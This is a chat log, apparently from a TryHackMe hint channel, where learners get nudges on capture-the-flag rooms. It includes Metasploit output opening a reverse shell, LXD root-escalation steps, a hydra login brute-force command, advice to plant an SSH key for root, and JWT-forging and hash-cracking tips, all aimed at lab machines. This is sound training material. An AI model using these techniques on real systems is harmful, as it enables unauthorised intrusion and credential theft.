#room-hints

or cd ~

Yes it is mentioned in the above link

or cd $HOME

Who the heck has ever typed cd $HOME

cd on it's own works

Hey guys, has anyone completed the 'Attacking Kerberos' room? I'm stuck on task 7 but I'm not sure what I'm doing wrong.

Hi there looking for a hint with the room GraphQL, question 1 task3 (pretty sure my query is good but can't find out after hoooooouuuurs). Thanks

Ignore my question - I figured it out.

Im doing the wireshark 101 room am on http portion looking for URI data stream and confused on where to find it any hints?

Kana helped me tyvm

yo the end of zth 2 had me feeling stupid

i feel stupider after finding it

Anyone done graphql room?

It's always best to just directly ask your question.
If someone can help, then they will.

Can't find the flag

In graphql for user Para

If there is one

Lmao, nvm. Sorry. I was looking for a flag. Got the hash.

can anybody help me in nerdherd

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.

I am stuck at Enumeration part , I found some encoded strings , unable to decode one of them

have a closer look at ||the image you found in the ftp|| @grim heron

Hello! I'm currently doing the Bolt room and I think something's wrong with my metasploit.

[*] Started reverse TCP handler on 10.9.190.109:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "hutayc".
[*] Found 3 potential token(s) for creating .php files.
[+] Deleted file mvfpeduf.php.
[+] Used token 9122f8ad27851994cb54bab4d0 to create hmmprqdzr.php.
[*] Attempting to execute the payload via "/files/hmmprqdzr.php?hutayc=`payload`"
[*] Command shell session 1 opened (10.9.190.109:4444 -> 10.10.233.64:58770) at 2020-11-05 21:25:31 -0500
[!] No response, may have executed a blocking payload!
[+] Deleted file hmmprqdzr.php.
[+] Reverted user profile back to original state.


^C
Abort session 1? [y/N]  n
[*] Aborting foreground process in the shell session

So I'm still waiting for it to connect

You might not have a prompt

Try backgrounding and foregrounding it

Can you explain foregrounding? What is that?

Control Z to background the session

I did that.

Then sessions -i putTheSessionNumberHere

msf5 exploit(unix/webapp/bolt_authenticated_rce) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.9.190.109:4444 -> 10.10.233.64:58770 (10.10.233.64)

msf5 exploit(unix/webapp/bolt_authenticated_rce) > sessions -i 1
[*] Starting interaction with 1...

Should I reboot the box or connect to it using SSH?

Surely you can't use SSH?

I didn't try

You don't have any creds that work for SSH

Don't I have the username and the password?

You probably don't have a prompt but do have a shell

Or those are just for the CMS

Don't I have the username and the password?
@distant violet For bolt yes, they shouldn't be the same

It's a different service

Oh, alright

The task requires me to "Look for flag.txt inside the machine."

Yeah

So you need to use the shell that you got from exploiting the service

But I cannot get to connect, so should I terminate, and deploy again?

You probably don't have a prompt but do have a shell
@stuck fractal

Oh

it did connect

So what do I do now?

Try running a command like id in that session

See if it works

/bin/sh: 2: id: not found

You have a shell

whoami

in fact yes, help does work

So you can use that shell to get a more stable shell

whoami root

Is SSH open?

Yes

My recommendation would be to add an authorised key to root and then try to SSH in from another terminal tab/window

That's hard, I think

That gets you a MUCH more stable shell, with the caveat that it only works for users with SSH enabled

It's not very hard

Shouldn't I just try to get the flag through the msf?

Copy your public key into /root/.ssh/authorized_keys

You can

But that shell is a pain and doesn't give you tab completion ETC

A full ssh session is more stable and more interactive

I am able to ls and everything, but I cannot seem to find the flag.txt

Nevermind, I did cd .., a few times and I found it

I fully recommend learning how to use the find command

It's super useful

I tried to use it and I just did "find flag.txt"

I wondered why it didn't do anything

Well, thanks for the help.

locate follows that kind of syntax but works slightly differently

I kinda need help installing john. Could you help me or isn't this the specific channel for this?

It ships as default with Kali, but #infosec-general

Hello again! How could I upload an alpine.../.tar.gz file to a server?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Hello again! How could I upload an alpine.../.tar.gz file to a server?
@distant violet there's some great articles for it.

@distant violet there's some great articles for it.
@stuck fractal I don't really know how could I google this

lxd privesc

The one that comes to mind is from hackingarticles.in

Package lxd is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'lxd' has no installation candidate

You need to very carefully consider where each command is being ran

What do you mean?

You gave no context with the error message

root@andrew:~# sudo apt-get -y install lxd
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package lxd is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'lxd' has no installation candidate

Does this help?

You don't need to install anything on your machine afaik

You don't need to install anything on your machine afaik
@stuck fractal Then how could I run lxd?

Where are you trying to escalate your privs?

On the room Gaming Server, I'm trying to use lxd to escalate privileges so I can get to root.txt

Exactly

So why are you running stuff on your own machine?

Well, how could I sudo on the server

You don't need sudo

That's the point

I mean I have to build alpine, right?

Yeah, use the script

And it says "must run as root"

Let me try again

The article explains this

Cloning into 'lxd-alpine-builder'...

I think it hanged

It's working

Give it time.

Alright, as you say.

Cloning into 'lxd-alpine-builder'...

Still waiting

Read the exploit and make sure to be on the right machine for each step

Wait, so I should download alpine-builder on the attacker machine or the remote machine?

Your machine

I did this.

The target machines do not have internet

I have alpine downloaded, and have builded it

But LXD isn't working on my machine

You should be able to follow the instructions in the article

If we are talking about the same exploit then you can see:

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

Indeed, we are talking about the same exploit. So how can I transfer the script to the victim?

You don't

So, I run it on my own machine?

Yes

Install LXD

On my machine?

If that's the case, I cannot.

apt update and try again

Otherwise #infosec-general for help installing lxd on your machine

Same error.

Nmap room

What switch should I include if I don't want to ping the host?

Can I get a hint

Have you checked the nmap manual?

yes

Can you specify which category pls

Control F ping?

what's that?

I probably meant which section does the answer fall into

Search for ping

oh ok

Thx @stuck fractal

anyone for a tiny nudge on keepers key task 2.3 for psycho break? saw reference in source. to the nightmare. tried searching through everything, stego and exif techniques on every picture, searched through the stylesheet, etc, couldnt find anything hint is appreciated.

directory bruteforcing

reeeeeeeally deep in directory-list-2.3-medium.txt

Right thanks I was using medium but quit like 1 minute in

Gracias I'll get it at it

i'm doing the room right now

i'm still mad at how deep it is

i actually can't believe this is the right way to find it

Hey there, i'm experincing an unusual problem.. room "Web Scanning", task 3, question #8
is it normal that i can't find the right answer in the alert tab?

which room? i couldn't understand your question, elaborate it more

sorry, i hit enter b4 my question was finished 😅

the answer should be in the alert tab...

hmmm...

try to scan again?

scanned like 10 times already

The alert is deprecated

It will no longer show up

ok... so how can we possibly know the answer just by doing the room?

The room needs updating.

It's a known issue

It's on the list.

ow, ok thanks! i can't see that issue on the room. that's why i asked 😉

I need help with this one

I have 0 idea on what to do

LOL

and it's the only thing that I have left before I move on to the other machines =))

which room?

Web Fundamentals > ZTH: Obscure Web Vulns Task 25

any help on 'year of the dog'? i've exploited the c****e, but only got a list of IDs and positions.

P.S. the 2nd writeup by Hackster is fake?

@wicked rain did you know you can dump the result of a MySQL query to a file?

@young tide that looks like JWT

P.S. the 2nd writeup by Hackster is fake?
@wicked rain it was like troll for me.. I just opened it XD

any help on 'year of the dog'? i've exploited the c****e, but only got a list of IDs and positions.
@wicked rain same here.. idk what to do with that

@indigo ridge check @cedar axle 's hint above.

I still need some hint on YOTD

@indigo ridge pay attention to the errors. some attack is mentioned. combine it with above hint and do some research.

@cedar axle it is and I already know how JWT tokens work I just have no idea how to decode the signaturesecret

@young tide there is a npm package for that.. use google

I need help with YOTD too. Got to ||gitea|| already but really puzzled about what to do with it.

@eager flicker google git hooks

@young tide damn, that's a premium room, cant help, I'm a poor student. i live on packet noodles

@indigo ridge something like this?
https://puu.sh/GKFDp/63f67e61e9.png

@cedar axle aye one of this days you'll get that premium room I just grabbed it to test the skills that I've learned from a certification body and so far so good the only thing left for me is the one that I asked about and the juiceshop

change the alg and send it back

jwt-cracker if you need to crack something

https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/

Thanks @indigo ridge !

thanks @cedar axle

https://blog.pentesteracademy.com/hacking-jwt-tokens-the-none-algorithm-67c14bb15771

it's the 3rd part of JWT that I need to decode @cedar axle it dosn't appear on jwt.io

I don't have access to the room, but if the algorithm is none, jwt just uses plain base64

yeah, it could be a weak secret or you just alter the alg to none

not sure exactly as i cant run the lab

there's nothing in the lab

I just need to get the 3rd part of the JWT token

the room i mean

right i thought you had to login to the page

1st is the header which has the typ: none
2nd is the payload
3rd is the secret I need to get the secret

xD

ignore all my posts

haahha no worries but thank you still for trying to help

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE

that's the exact token LOL

Is that an answer/ something the user needs for a room?

that's the question

Oh it's the example

that's the last challenge

LOL

but yea dark rider already answered my question

it was just right in front of me and I just read about it before the challenge

=))

@young tide jwt-cracker worked for me

Thanks @cedar axle yes that was the one that was needed

took me like 7 hours for that question and a hint

OMG

sometimes it's the trivial sh#t that trip's you over

Thanks Guys!

LOL

yea seriously though

that took a long time

ahah

meh dont worry

Hey guys,
WackoPico Web App Room, does usernames extraction require using burp intruder ?

??

What's the room code?

room code ?

title ?

WebAppSec 101

What task?

If you meant username enumeration the answer is it's not required although doing it manually might take you hours or days

What task?
@woven mirage Task 4) Question #4

If you meant username enumeration the answer is it's not required although doing it manually might take you hours or days
@young tide haha yes thats the problem

I just looked up the writeup

Well, you can use burp intruder if you want to brute force

But you can find users without brutefoercing at all

Try to create a user and check how can you exploit an url param in one of the pages to view info about other users

ahhhhhh i see noww

thanks buddy

Np

Any hints for Year of the dog room? I'm not yet a d***n user and know about additional service, not sure how to exploit it. Any suggestions?

Hei.
I just achieved 45 day streak and I saw that I got 5% of swag. What does it means?

You get a 5% discount @ https://store.tryhackme.com/

Email support@tryhackme.com to receive your code

Thank youu!

@narrow barn make sure you check all the files you might have dismissed, I did the same thing

you have work to do, files to analyse

got it 🙂 Thanks @cedar axle

Any hints for Hogwarts room please?

That's a KoTH box, rather than a room

As it changes every time, it's hard to provide hints

Quick question. In Hackpark room, was it intentional for admin creds to be openly available with winPeas?

I feel like I cheated >.<

iirc yes

I feel like that wasnt the intended path but it was there and they just left it

Wait wut

You mean, i spent all those hours

And priv esc password was just there

Msh

I feel like it wasnt the intended path BUT winPEAS yelled at me with autologon credentials

After fumbling a little with metasploit I decided to just rdp with potential credentials. And there I was NT Authority System@frail rain

hello

Can someone give me some hint how to crack the password in this Brute room

i know hydra but line of command . . . . . . . .

i know hydra but line of command . . . . . . . .
@magic gale i'm trying for about 2 hours now 😦

It's a new room. Hints/help are allowed after 72 hours of release.

in insecure deserialization i am not getting anything on listening through netcat

hydra -l admin -P ~/Desktop/rockyou.txt ip http-post-form "/admin:user=^USER^&pass=^PASS^:Username or password invalid"

i'm getting multiple passwords, and those are not working, am i doing wrong please suggest

this room has no hints till it's 72 hours old

the same prob happend with me

put /index.php

@white salmon it's kinda walkthough

sure @kind bear

It worked, Thankyou so much

Is this the hydra or brute it room?

brute it room

Two things guys, first we try to avoid hinting on new rooms for the first 72 hours, secondly if you are going to post spoilers please surround them with spoiler tags, ||, on either side of the text

And for clarity, the exact syntax of a command is a spoiler

Room Js basics
Task no 5 question no 2
Any hints please

add something to your first word

Ooooo gocha thanks a lott

@kind bear @stark rapids please do not ask for or provide hints or help for 72 hours after the release of the challenge.

This is under Rule 13.

yup sure, even if it's walkthrough ?

@stuck fractal pleases confirm

It's a challenge room, is it not?

yeah got you, so if for walkthough has anyquestions we can ask right

What?

It is a challenge room.

yeah i got it, i'm asking in general

The 72 hour rule applies to challenges.

hydra -l admin -P ~/Desktop/rockyou.txt ip http-post-form "/admin:user=^USER^&pass=^PASS^:Username or password invalid"
@stark rapids what room are you on

okay @stuck fractal

@fiery moth it's Brute it

might help

i am not able to give you any hints so

You're trying to provide hints and help

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

that wasnt a hint but k

hello, i'm working on the burp suite room...i'm on task 11 and i'm lost on stop 1..."Let's first take a look at decoder by revisiting an old friend. Previously we discovered the scoreboard within the site JavaScript. Return to our target tab and find the API endpoint highlighted in the following request:"..... i am confused about this scoreboard reference, I went back through the entire room and can't find any information on it and its not showing up in my site map...

the score board is here @stark parrot ||http://10.10.XXX.YYY/api/Challenges/?name=Score Board||

ok...how would i have known that?

when did we previously discover the scoreboard?

my burp crashed on one of my previous steps... i had to restart it

honestly I don't remember, I've used juiceshop a lot in the past though and i know it from there

its possible i lost some information when that happened

i just want to understand what i missed

really frustrating, as i've gone back through the birp suite room multiple times now and see no reference to this scoreboard they speak of

finding it is actually a task on the juice shop scoreboard

https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/part2/score-board.html

cool, the room references a task not otherwise discussed in the room. makes sense

thank you for the help

so i don't understand the preferred course of learning then. why isn't this covered ahead of time? i'm following the course under dashboard, completed welcome and metasploit, moved to vulnersity and was sent over to birp suite room as a prereq

this is all very confusing for someone who just wants a progressive path

they speak on the scoreboard as if we covered it in the room but we didn't.... lol

am i starting at the wrong spot?

what I will say is that the very first lesson this site tries to teach you is to research

a quick google for "owasp juice shop scoreboard" will answer your original question for example

no, just be patient and keep at it, and always be prepared to fill in the gaps with a little googling outside of the provided content and hints

some discord problems there, seems like half my messages got lsot

i think. i definitely appreciate you helping me through this

you can use #room-bugs to leave some feedback on the room if you want

a community user's tutorial?

keep at it and you'll get there, patience, time and persistence pay off with this stuff

anyone i can ask on nmap room? stuck on task 1 number 3 lol

google "nmap well-known ports"

3rd result gives the answer

thanks!

Hello guys! I hope you are doing alright!
Yesterday I tried "Jack" (https://tryhackme.com/room/jack).

I checked the writeup to see how to escalate privileges in WP and all of them are exploting a plugin.
But neither with wpscan nor after being logged I am able to find the plugin.

I finished the room but still fail to see how people found that plugin

I know what you mean. Did you check the possible commands and options you can use with wpscan?

first time using wpscan

I check the help command and found:
-e p and ap

I tried popular plugins first -> no results
I tried all plugins -> no results

@bold star the plugin is called User Role Editor

As far as I know wpscan emunerates the plugins with passive detection. There is an option to change that. Try this with the most popular plugins :)

I know the plugin by checking the writeups and the rest went smoothly.
Thank you @true prairie! I will check the options again ❤️

You are the best! It was at the end of the help screen

Now I managed to find it

10/10

No problem 👌

hey all need a nudge on root for break out of the cage. got the || encoded string in cage user's email_3 || i assume it may be || vigenere cipher like last time|| if so any nudges on getting the key? if not a small nudge in the right direction? thanks

Do you have a key for the first cipher text?

yeah, its not the same key

What tool have you tried to decode your cipher text ?

ive just been using cyberchef

There is a website for cracking it without a key

Hey guys! Hope everyone is good! I’m in the middle of room Brute IT and stuck in task 3 question 1 what’s user:password of admin panel, tried to brute force it with hydra but getting false positive results can anyone give hint?

Vigenere solver iirc

bruteforcing the key dosent work

But if remember, you can find the key with

??

That's weird. I used vigenere solver. Don't know exactly if it was a variant. Might have to check it again

Hey guys! Hope everyone is good! I’m in the middle of room Brute IT and stuck in task 3 question 1 what’s user:password of admin panel, tried to brute force it with hydra but getting false positive results can anyone give hint?
@wicked plaza That's still a new room, please wait 72 hours from room release before asking for help or hints

key for first cipher was like twelve characters

even if it was bruteforcable i really would prefer to do it legit

a nudge from someone who has actually done the room?

https://discordapp.com/channels/521382216299839518/690557518837186560/774732454660931637

Without brute force you should read through the email again. It isn't really a key but a word that really gets mentioned noticeably

ok thanks

got it feeling stupid gracias @true prairie

Not a problem. Felt stupid as well. Seems so obvious looking back at it

Hey guys is there any tutorial to do privilege escalation using "cat" command?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

@untold elbow https://gtfobins.github.io/

I really hope this isn't for Brute It

i dont know the question wasnt specific

That's why we asked for clarification

oh i c

General questions go elsewhere

And you're able to delete your own messages

Hey I am running into an issue with brute it room I run hydra and get 16 useable passwords but nun of them work

You are using the wrong command and it's giving you false positives most probably

Can't actively help with the room as it's not 72 hours old yet

i am working on the blue room, it seems as if my metasploit defaulted to meterpreter instead of shell... is that normal? a new default maybe?

using windows/smb/ms17_010_eternalblue

Yes, It's is expected now @stark parrot

Skip over that part

ok, Thank you

Algum brasileiro aqui?

English please. 🙂

hello I am working through steel mountain room, currently on task 3 step 3, it says i should be able to overwrite this service ACSService.exe

but when I try to move my reverse shell executable and overwrite it, i get access denied

dirp, i need to stop the service

Hello! How everyone is doing? I just learned Privesc on Linux in the Complete Beginner path and I wanted to practice it on a room. So some advised me Wonderland but I'm stuck right now 😅
I successfully logged in alice account and performed a LinEnum scan. I tried some suid files, checked cron, checked /etc/passwd but no luck.
I think I need to horizontaly escalate to find user.txt as I think it is in rabbit directory but I'm running out of idea.

It's something you'll find very quickly with enumeration, but you might not know how to exploit it

Do I need to put this aside and come back later when I learn more about linux and/or privesc?

Nope. You can probably find a method with a couple google searches about what you're seeing

Something relatively obvious now that you're logged in as Alice. Something you should always check for privesc.

I'll put next sentences as spoiler if it's okay. I'm not sure about what you're talking about

sudo -l is awesome

Something you should always try

Then it's a matter of researching what you're seeing

|| Do you mean sudo -l? I saw something like (rabbit) python3.6 but I don't know what does that mean and how to use it indeed ||

Alright

I was right then. I need to check it you're right

Oh and thank you btw James! I'll check that out

Hi, I am stuck at Empire room Module 8 Question #2. Is anyone willing to give a hint? I tried with results from mitre based on empire software but no success 😦

Nvm found it

😄

What's the format for john when attempting to crack an id_rsa? is it john hash.txt --wordlist=rockyou.txt ?

there's a step before, need to use ssh2john

but then yes

yea i did the ss2john.py got the hash.txt

must be missing something... thanks

well what response do you get?

http://prntscr.com/vfn5mi

and is the rockyou.txt file in the directory you're executing the command in?

i see thats prob what i did wrong

yep that was it thanks!

hello everyone. in the linux challenge room task 2 #4. im getting an error trying to open up a specific file saying i dont have permissions. i went into a specific folder where the cronjobs are created and i see the file or folder or whatever it is and i cant access it

please gimme a hint

i already went back to bob to see if he had privileges but he doesnt

It's a different place

It's a file you definitely have permissions for

Keep looking

james i dont want to give away anything can i message you privately

No

okay ill go look elsewhere

I put 99% odds on you currently looking in like, var/spool/cron or something

thats where i am

lol

Which is where the cron processes start or something

But not where they are created

oh

okay

ill go looking again

Found it @stuck fractal thanks

what is the file ll in nootnoot ?

it outputs 1-1000 when catted

It's a rabbit hole

just tell am i going the right way for final challenge or not

That file is not the right thing. So no

oh

Do you understand what a rabbit hole is in CTF?

im trying to grep for the characters c9. so i used this command find / c9 | grep c9

but its coming up with alot of unnecessary stuff

That would be finding files that contain c9

I’m assuming you’re doing the one that wants what is in the file to be c9

yup

So I’d suggest looking a bit deeper into how to use the find command

Cuz that’s not doing what you think it is

okay thanks

Files that contain "c9" in the file name, more accurately

trying to finish the last task for steel mountain where you use powershell, winPEAs to compromise the system instead of metasploit

i'm having a hard time with the web server setup

or i was able to get http.server up on 8000

but it doesn't seem like its working w/ netcat and the python script

SyntaxError: EOF while scanning triple-quoted string literal

Did you download it to the target?

what the hell is the secret spicy soup recipe

i swear its not anywhere on the website and its not anywhere on the machine i am about to lose my mind

???

LOL

It is tho

nevermind im just blind my bad

godammit i never read /

@dull pulsar @halcyon bison Please bear in mind rule 13. No hints or help on new challenges for 72 hours after release

wopps sorry

My bad

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

?

As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator. Applies to everyone.

I'm not giving any answer, just jk

Giving answers is against the rules under cheating anyway

But just... don't engage

He said "

nevermind im just blind my bad

But just... don't engage

Ok, sorry about that!

guys, I'm trying to solve the room advent of cyber. Right now in day 1. When I try and decode the value of the cookie for the 2nd question. It says incorrect even though I've verified through hash identifier and it turns it to be base 64. am I going into a rabbit hole?

It is asking for the static part, right?

There's one part that changes, and one part that stays the same.

Honestly, I have no clue. I'll just show you the cookie

Show me the question instead

That'd be more useful to me

Yeah

So there's part that varies by user.

And a part that is constant.

Create a new user account and you'll probably see which is which

will give it a shot.

managed to get it. Thanks

@uneven kayak That's still a brand new room, please don't ask for help or hints for 72 hours after release. This is under rule 13.

ah sorry dont know that

Anyone have done Internal from the oscp path?

It's always best to just directly ask your question.
If someone can help, then they will.

I've been searching for paths, creds on that box for a while but can't find anything.

I'm the creator.

What have you tried?

could someone give me a hint for starup on how to get access as a user.

i have a shell as www-data

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.

sorry

i am doing startup

Also it's a new room.

oh

Hints/help are allowed after 72 hours of release.

okay

Hi everyone, can anyone give me a hint for wireshark 101 room task 7 question 4. I have tried and search a lot but can’t find an answer for that format

you need to filter the packages

Which packet I tried a lot

I have seen like a reply packets but not sure what is the answer

there are some reply packages you need the id of them

I found some like 3 packets but can’t find the answer

there are more reply packages

@prisma blade share photo of task

I stuck on same room at task need to verify if it's same then I can tell you answer @prisma blade

We don't share anwsers

can you share questions?

without the anwser yes

i think that's what he was asking

hey i am trying to solve startup and currently stuck at root , i tried a number of things deletion, rev shell, export root etc.. but no luck can anyone shoot a hint

im stuck at user 😓

it's a new room guys and not 72 hours yet

oh ok i got the link from friend didnt check

can i hint

for?

Nmap

can i have hint

nmap room?

yeah

Which question and task

You need to be specific because we don’t know where you’re stuck

ask!

task 1
What networking constructs are used to direct traffic to the right application on a server?

question no. 1

p

thanks i got it correct

Anyone completed Startup room ?

that's a new room @limber iron, no hints allowed for the first 72 hours

that's a new room @limber iron, no hints allowed for the first 72 hours
@median compass sure i'm just asking

yes, I finished it, lots have I'm sure

Can i dm you about something please ?

is there limit asking for hints?

only for new boxes @hidden fractal

sure you can @limber iron, still no hints though

Question:

What if I want to run all scripts out of the vulnerability category?

nmap

https://nmap.org/nsedoc/categories/vuln.html

https://book.hacktricks.xyz/pentesting/pentesting-network/nmap-summary-esp

did you try putting those exact words "What if I want to run all scripts out of the vulnerability category? nmap" into google @hidden fractal? within a couple of the top links I can find your answer

i found lready found it

I check poodog link

if you want to learn then google skills are pretty important, it's worth looking for yourself, you'll learn a lot more that way

did you try putting those exact words "What if I want to run all scripts out of the vulnerability category? nmap" into google @hidden fractal? within a couple of the top links I can find your answer
@median compass i seached "vuln nmap"

oh ok thx for the tips
im just not used to googling

it's just practice, the more you do the easier it gets, keep at it 🙂

you should do the google dorks room

does the linux final challenge has something to do with "man page of sudo is very nice "

not sure if that's a question...

which room and task @small oracle?

linux beginner last question

you mean the "Learn Linux" room?

yes

😅

do you have the user ||nootnoot|| ?

no im trying to get into every user

too see

im trying every user name and password i see

in there

let's see if one matches

and trying to get into hidden areas

using find

ok, one good strategy in general is to look for every user that you do have for files that they own ||find / <-user/-group>||

please don't tell how to get

everyone im not opening spoilers

anymore

don't look at the spoilers if you don't want them, that's why they're hidden

ok

one of your existing users has a file in an odd location, happy hunting

hmm 🤔

and eventually yes, sudo is part of it, to answer your original question

@median compass existing means shiva1-4 ?

shiba1-4 yes

hmm 🤔

is ll file a part of it ?

it prints 1-1000 on

cat

what file?

ll file in noot i guess

the name of the file is ll

double ll

not sure what that is - you've already used find in Task 31, question 3, just use that with your shiba users, one file should pop out for you

is it normal that nmapping takes so much time?

it can do @hidden fractal, depends on how the box you're scanning is configured

Also depends on "what" and how you are scanning

What options are you using

is it not about wifi or anything?

No, it's usually not

What options are you using
@final mortar -A

-A takes time, cause it' discovering a lot of stuff

Just like a full port scan -p- takes time

You can use -vv so check how much your scan is done, what ETA and stuff like that

You can also speed your your scans with -T4

you can try rustscan too @hidden fractal, sometimes having different tools for different situations is a good thing

if you just want to list open ports masscan is good

#infosec-general ask here.

what is the meaning of rabbit hole in case of ctf can someone explain ?

a rabbit hole is something that looks like a useful direction to find an exploit but actually goes nowhere

oh

they teach you to not stop looking for ALL interesting things just because you find one

rabbit hole = red herring

@median compass i looked for every user using command i used every user except shiba4 is same

but shiba4 is already used

and sometimes im getting pam auth error

I'm in the LInux Challenges room and I'm trying to find all of the flags. #9 says to look at the hosts file. I feel I need to use sudo commands, but neither Garry or Bob is on the sudoers list. So I was going to edit the sudoers list, but it won't let me.

and cannot login anywhere

Am I going about this wrong?

Read the host file. No need to edit it.

Yeah...just figured that out. Ty

I tend to see every door as needing to be kicked in. I lost sight of what I should have don.e

@small oracle try as user ||shiba2||, you'll find a file in an odd place, ||/var/log||

I have started that room myself and verified this, it's definitely there

hello, i'm still struggling with this SteelMountain room, specifically access and escalation without metasploit. so I did some googling and everything is telling me to start SimpleHTTPServer on port 80. Can't get that module to load in python3, so run python3 -m http.server which works but won't start on port 80 cause something is already listening on 80. Box shows 2 processes listening on port 80, when I kill them both, my attackbox becomes immediately inaccessible... what am I missing

i think you want to be running the web server on your attack box @stark parrot, the purpose of the server is to allow the exploit to pull across nc.exe

understood, thats where i am trying to set it up

but there are 2 process already using port 80

and everytime i kill the process, my attackbox is un-usable, i have to reboot it

your attack box is running a webpage?

can you show me?

If you full screen the attackbox

It uses a service on port 80

oooooooo interesting

ahhhh you're not on a VM, gotcha

If you use it in the small window it seems fine. Might also be able to SSH in?

let me test

very interesting lol

root@ip-10-10-177-226:~# python3 -m http.server 80
Traceback (most recent call last):
File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"main", mod_spec)
File "/usr/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/usr/lib/python3.6/http/server.py", line 1211, in <module>
test(HandlerClass=handler_class, port=args.port, bind=args.bind)
File "/usr/lib/python3.6/http/server.py", line 1185, in test
with ServerClass(server_address, HandlerClass) as httpd:
File "/usr/lib/python3.6/socketserver.py", line 456, in init
self.server_bind()
File "/usr/lib/python3.6/http/server.py", line 136, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.6/socketserver.py", line 470, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
root@ip-10-10-177-226:~# lsof -i :80
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
python 1458 root 3u IPv4 28104 0t0 TCP *:http (LISTEN)
python 2349 root 3u IPv4 28104 0t0 TCP *:http (LISTEN)
python 2349 root 4u IPv4 33280 0t0 TCP ip-10-10-177-226.eu-west-1.compute.internal:http->ip-10-100-2-28.eu-west-1.compute.internal:39676 (ESTABLISHED)

when i kill process 2349, immediately lose my attack box

so i can't bind anything to port 80

i guess maybe i should look at using my own vm

same problem if i use split screen view on the VM

Yeah I'm talking about the small window on the my-machine page

Or ssh in

if you ssh in you'll lose the GUI when you kill that process but you'll still have a command line and be able to continue

ok, sweet

i can ssh directly to the attackbox on the public ip?

thats too easy

if you ssh in you'll lose the GUI when you kill that process but you'll still have a command line and be able to continue
@median compass You'll lose access to the gui from the fullscreen/splitscreen

It still exists etc

yeah this should work, i just ssh'd to it

lets see what i can do

sure, they'll have lost it though, I was simply making it easy

woooooo, hell ya, thanks team 🙂

http.server up and running on port 80

Hey guys, I am gonna need a little push on https://tryhackme.com/room/basicpentestingjt on the last task

||I tried uploading files via smbclient since the staff.txt file made me think I could, but the smb.conf doesn't look like I am allowed to write to any share?||

don't think that's the route @flint lintel

try ||looking for interesting files in the other users home directories perhaps||

don't think that's the route @flint lintel
@median compass ||oh is it more related to ssh now?||

👍

Thank you!!!

hey

Oh...servers must be back up.

I'm struggling with the MOTD in the Linux Challenge room.

I've seen 2 places where the web says the files are, but they aren't there.

cd..

lol

where have you looked?

/etc/motd and /usr/bin/scripts

when i google "ubuntu motd files" the very first link gives me the right location, try it

ls

yessir

ty

Got it.

TY

excellent, well done

keep going now

morning gang. i could really use a nudge on privesc for willow. found ||creds|| in ||/mnt|| having trouble finding a way to mount this device, but have additionally tried googling ways to view a partion without mounting. finally my concern is i should be looking at something else. afterall, ||/mnt/creds|| is a directory and not a disk. any help appreciated

So, flag13 is somewhere in the 2 scripts of the Titanic movie. I tried to do an egrep to find flag, and it only found the flagpole to which they clung.

Would grep work for this?

Can I use it to compare the 2 easily?

I think it tells you to use diff?

@rose cape, anything mountable can be found in ||/dev|| have a look there to see if anything jumps out

looked there, i guess i didnt look hard enough! thanks @median compass

Didn't realize we had a diff command. Popped right up. Ty

I found the kernel version! Woohoo!!

I'm really not sure what I'm supposed to do with that. I'm trying to see if there are other ways of finding that info with the hope that there will be something nearby to show me the way.

That's for a specific question in Linux Challenges right?

Yessir

